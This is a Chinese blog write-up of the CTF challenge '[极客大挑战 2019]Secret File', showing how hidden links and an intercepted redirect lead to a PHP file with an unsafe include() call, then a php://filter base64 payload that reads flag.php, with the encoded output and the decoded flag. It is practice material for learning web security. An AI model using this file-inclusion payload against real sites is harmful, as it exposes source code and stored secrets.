[极客大挑战 2019]Secret File

最新推荐文章于 2023-07-09 23:02:00 发布
最新推荐文章于 2023-07-09 23:02:00 发布
阅读量536 收藏 1
点赞数
分类专栏: CTF 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Brain_Gym/article/details/125037739
版权

题目链接

考点分析

本题考察对网络数据包的拦截,php审计,php伪协议

工具链接

Fiddler Classic 下载

解题步骤

(1) 初探网站

打开网站一片漆黑中间几行红色大字

你想知道蒋璐源的秘密么?
想要的话可以给你,去找吧!把一切都放在那里了!
Syclover @ cl4y

难道暗藏玄机? F12 查看

<html><head><style type="text/css">
#master {
    position:absolute;
    left:44%;
    bottom:0;
    text-align :center;
        }
        p,h1 {
                cursor: default;
        }
</style>

        
                <meta charset="utf-8">
                <title>蒋璐源的秘密</title>
        </head>

        <body style="background-color:black;"><br><br><br><br><br><br>

            <h1 style="font-family:verdana;color:red;text-align:center;">你想知道蒋璐源的秘密么?</h1><br><br><br>

            <p style="font-family:arial;color:red;font-size:20px;text-align:center;">想要的话可以给你,去找吧!把一切都放在那里了!</p>
            <a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>
            <div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
        

</body></html>

额哈 /Archive_room.php

(2) 顺藤摸瓜

访问../Archive_room.php网页
网页中有一个鲜红的 SECRET 按钮单机一下
什么?

查阅结束
没看清么?回去再仔细看看吧。

耍我呢?

(3)釜底抽薪

是时候展现我们真正的实力了
上工具Fiddler Classic
再次访问../Archive_room.php网页
轻松找到 action.php 跑过了和尚跑不过庙 终于抓住你了
点开

<!DOCTYPE html>

<html>
<!--
   secr3t.php        
-->
</html>

原来元凶在这 => secr3t.php

(4) 直端老巢

访问 ../secr3t.php
源代码出现

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

根据提示直接访问..?file=flag.php
可恶又被耍了

啊哈!你找到我了!可是你看不到我QAQ~~~
我就在这里
(5) 决胜时刻

平复一下心情 喝口柠檬水压压惊
重新再看一遍代码 竟没有过滤file
上一次同样的套路
php://filter"伪协议” 来进行包含 加上read=convert.base64-encode来对文件内容进行编码
构造payload:?file=php://filter/read=convert.base64-encode/resource=flag.php
返回

PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7NTdlN2I4YmMtMjA1ZS00MWIyLTk4MTMtMGRmMjY2MDdkNjc4fSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=

Base64 解码 得到flag

<!DOCTYPE html>

<html>

    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>
        
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
        
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{57e7b8bc-205e-41b2-9813-0df26607d678}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>

</html>

大功告成

素影·流年
关注
专栏目录
buuctf [极客挑战 2019]Secret File 1
hintll的博客
06-14 374
[极客挑战 2019]Secret File 1 打开以后: 老规矩,直接看源码: 看到第27行 有个提示文件 直接访问: 点一下secret 让我回去仔细看看: 回去再看一遍源码 还是没有提示 可能是页面跳转太快 那就抓个包看看: 既然是跳转快,那就重新发送有个 然后看看它的回应包: 这个回应包里面有一个提示文件 那就直接访问一下试试: 有一个备注:flag放在flag.php里面 那就访问这个flag.php 它说看不到它 那就看看源代码 也没有 那应该是它不可以读这个文件 那这题可能是考察php伪协
[极客挑战 2019]Secret File 1解题思路
m0_74047686的博客
03-04 2357
在做这道题的时候,主要是会使用burpsute工具,并且还要了解PHP伪协议的一些知识及概念,最后还用到了一些密码里的base64,这些都需要了解一下。
BUUCTF [极客挑战 2019] Secret File
Senimo
10-17 631
BUUCTF [极客挑战 2019] Secret File 启动靶机,开启环境: 页面无按钮,查看网页源码: <p style="font-family:arial;color:red;font-size:20px;text-align:center;">想要的话可以给你,去找吧!把一切都放在那里了!</p> <a id="master" href="./Archive_room.php" style="background-color:#000000;height:70
BUU刷题记1
Kanyun的博客
07-22 830
ps参数顺序要注意,ba换位ab,flag会被检测出来)ctfping命令执行这一题好像在前端就进行了文件格式过滤,猜测在js中进行判断,尝试寻找js----->失败只能BP抓包修改后缀类型了判断注入点后,常规查询,发现部分关键字被绕过。...
BUUCTF [极客挑战 2019]EasySQL
m0_49025459的博客
04-06 274
题目 这题啊很快奥,我就想用个永真表达式测试一次,结果一下子就出来了 admin' or '1'='1 登录
BUUCTF[极客挑战 2019]Secret File
devilare的博客
03-22 1422
BUUCTF[极客挑战 2019]Secret File 挺有意思的一道题,打开链接。蒋璐源的秘密?没兴趣,本人不喜欢探索别人的秘密。好吧,hacker喜欢。F12查看一下源码。出现下一个页面,点击试试 嗯?!闪电侠也看不清,估计是玩我呢,退回刚刚的页面,F12看看 果然,同样的错误不允许犯两次,嗯。。。。怎么办呢?抓个包看看。 访问该页面 果然就是这里,代码审计一下,包含一个file的文件,用get方式传输,如果存在…/,tp,input,data等就会输出Oh no!并且退出,说明要包含的文件不能
BUUCTF [极客挑战 2019]Secret File
m0_49025459的博客
04-27 2783
题目 查看网页源代码 <!DOCTYPE html> <html> <style type="text/css" > #master { position:absolute; left:44%; bottom:0; text-align :center; } p,h1 { cursor: default; } </style>
极客挑战2019secret file
03-16
极客挑战2019Secret File是一个神秘的文件,里面可能包含了一些重要的信息或者任务。参赛者需要通过各种技能和智慧来解密这个文件,完成挑战。这是一个非常有趣和刺激的比赛,可以锻炼参赛者的思维能力和团队...
[极客挑战 2019]Secret File 1解题思路及BurpSuite教程
qq_24594197的博客
04-28 3668
网页跳的快让你看不到怎么办?使用BurpSuite就好了,软件放这里:链接,提取码:kmwc,教程 浏览器代理配置随便放一个:IE,chorme,火狐代理设置,设置完成后打卡burpsuite软件,第一次用这个软件,看来网上很多教程写的很简单,什么抓包,右键 —> Send to Repeater,但是小白的我试了半天才搞懂,特意写下来给那些小白看,到结合这道题讲讲,F12查看源代码 在网址后面加上Archive_room.php,提示看不清? 使用工具BurpSuite,点击下图jar包即可,先看看
BUUCTF系列 // [极客挑战 2019] Secret File
qq_45805420的博客
09-25 514
前言 本题知识点:PHP 文件包含漏洞 & 利用网页背景隐藏信息 WP 进入题目页面,乍看没有什么明显的思路,查看网页源代码,发现源码中出现了部分在页面中被隐藏了的信息,这才意识到了出题者的心思 这个小技巧原理并不复杂,主要是在前端中利用网页的背景颜色来覆盖相同颜色的内容,使得相关信息肉眼不可见,初次相遇确实不易 Get 到思路,可以通过全选页面内容的方式,使所有的信息展现出来 点击隐藏信息,题目跳转到了一个新的页面 尝试点击SECRET按钮,网页再次跳转 根据该页面的信息判断,SECRET
逗比学CTF.day7
weixin_45963786的博客
03-14 318
[极客挑战 2019]Secret File—BUUCTF 哦,第一反应找源码看看 <!DOCTYPE html> <html> <style type="text/css" > #master { position:absolute; left:44%; bottom:0; text-align :center; } p,h1 { cursor: default;
第五十八题——[极客挑战 2019]FinalSQL
分享简单的安全技术
05-08 810
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,看到sql测试框,以及1,2,3,4,5超链接 第二步:测试漏洞点 点击1超链接后出现NO! Not this! Click others~~~字样,在URL地址栏添加^2后发现注入点 第三步:获取flag 由于^一般适用于盲注猜测ASCII码值,所以这里使用盲注获取flag 手动测试回显字样:输入http://d9cc6ff9-ac2f-4193-985d-dce132ad08bd.node3.buuoj.
每天一道ctf
whisper921的博客
10-28 1045
有这样一行代码
刷题 - BUUCTF(BUUOJ) - WEB - DAY3
最新发布
qq_36902977的博客
07-09 892
BUUCTF BUUOJ WEB 刷题 学习笔记 SQL注入 万能密码
BUUCTF笔记之Web系列部分WriteUp(二)
克格莫(有需要的私信)
05-17 2396
1、[极客挑战 2019]Http 不敢置信12世纪了还有这种简单题,我还在拼命扫目录和备份。。。。 在secret.php重发http请求头 Referer: https://www.Sycsecret.com 修改User-Agent为Syclover: 这里伪造来源IP 添加一个字段X-Forwarded-For: 127.0.0.1 拿到flag. ...
BUUCTF刷题记录
bmth666的博客
03-15 2346
文章目录web[强网杯 2019]随便注[护网杯 2018]easy_tornado web [强网杯 2019]随便注 注意表的两端两边要加:`` 1' ; show databases;#查看数据库 1' ;show tables;#查看表 0'; show columns from words ;#查看words表中字段 0';show columns from 19198109311...
[极客挑战 2019]FinalSQL
satasun的博客
11-15 2314
[极客挑战 2019]FinalSQL 先骂出题人 出题人是真的狗,废话不多说先放最后爆破的结果: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{01d295cf-0c9c-44db-98ca-c7877
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值